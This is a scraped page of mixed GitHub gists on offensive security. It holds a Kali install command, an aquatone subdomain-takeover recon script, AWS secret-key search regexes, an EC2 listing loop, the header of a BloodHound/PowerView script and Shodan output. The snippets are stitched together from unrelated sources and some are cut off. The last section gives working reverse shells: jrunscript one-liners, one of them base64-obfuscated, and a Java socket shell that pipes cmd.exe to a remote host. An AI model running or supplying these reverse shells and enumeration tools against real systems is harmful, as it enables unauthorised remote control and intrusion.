Command:
apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies
Command:
royharoush
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| aquatone-discover -d $1 --threads 10 | |
| aquatone-scan -d $1 --ports huge --threads 10 | |
| DEBUG=nightmare xvfb-run -a aquatone-gather -d $1 --threads 10 | |
| aquatone-takeover -d $1 --threads 10 |
jayluxferro
/ Kali_Desktop_Environments_Installation_and_Removal.md
Last active
October 10, 2025 16:13
Kali Desktop Environments Installation and Removal
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| url - https://aws.amazon.com/blogs/security/a-safer-way-to-distribute-aws-credentials-to-ec2/ | |
| Finding hard-coded credentials in your code | |
| Hopefully you’re excited about deploying credentials to EC2 that are automatically rotated. Now that you’re using Roles, a good security practice would be to go through your code and remove any references to AKID/Secret. We suggest running the following regular expressions against your code base: | |
| Search for access key IDs: (?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9]). In English, this regular expression says: Find me 20-character, uppercase, alphanumeric strings that don’t have any uppercase, alphanumeric characters immediately before or after. | |
| Search for secret access keys: (?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=]). In English, this regular expression says: Find me 40-character, base-64 strings that don’t have any base 64 characters immediately before or after. | |
| If grep is your preferred tool, run a recursive, Perl-compatible search using the following commands |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # install aws cli first and configure it with credentials and default region | |
| # the script will iterate over all regions of AWS | |
| for region in `aws ec2 describe-regions --output text | cut -f4` | |
| do | |
| echo -e "\nListing Instances in region:'$region'..." | |
| aws ec2 describe-instances --query "Reservations[*].Instances[*].{IP:PublicIpAddress,ID:InstanceId,Type:InstanceType,State:State.Name,Name:Tags[0].Value}" --output=table --region $region | |
| done |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # crt.sh sub-domain check by 1N3@CrowdShield | |
| # https://crowdshield.com | |
| # | |
| OKBLUE='\033[94m' | |
| OKRED='\033[91m' | |
| OKGREEN='\033[92m' | |
| OKORANGE='\033[93m' |
michenriksen
/ extract.sh
Created
August 19, 2016 10:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| extract() { | |
| if [ -f $1 ] ; then | |
| case $1 in | |
| *.tar.bz2) tar xvjf $1 ;; | |
| *.tar.gz) tar xvzf $1 ;; | |
| *.bz2) bunzip2 $1 ;; | |
| *.rar) unrar x $1 ;; | |
| *.gz) gunzip $1 ;; | |
| *.tar) tar xvf $1 ;; | |
| *.tbz2) tar xvjf $1 ;; |
vector-sec
/ Modified_Bloodhound.ps1
Created
August 10, 2016 17:24
This is a modified version of Bloodhound.ps1, a part of https://github.com/adaptivethreat/BloodHound/ The modification is simply adding a GroupName paramter to Get-BloodhoundData to use in conjunction with -CollectionMethod Group
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #requires -version 2 | |
| <# | |
| PowerSploit File: PowerView.ps1 | |
| Author: Will Schroeder (@harmj0y) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None |
achillean
/ http-components.csv
Last active
June 29, 2021 08:31
Sample output from the Shodan CLI running: shodan stats --facets http.component:100,port:20 http-components http
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Query | http | |||
|---|---|---|---|---|
| http.component | port | |||
| jQuery | 1250676 | 80 | 56553138 | |
| Zepto | 483672 | 7547 | 50655465 | |
| PHP | 266668 | 443 | 26476433 | |
| Twitter Bootstrap | 255045 | 4567 | 11633390 | |
| Google Font API | 211921 | 8080 | 8631875 | |
| WordPress | 139645 | 1900 | 4540344 | |
| Font Awesome | 133483 | 49152 | 3028740 |
Nashorn / Rhino:
- Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'- Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| String host="localhost"; | |
| int port=8044; | |
| String cmd="cmd.exe"; | |
| Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); |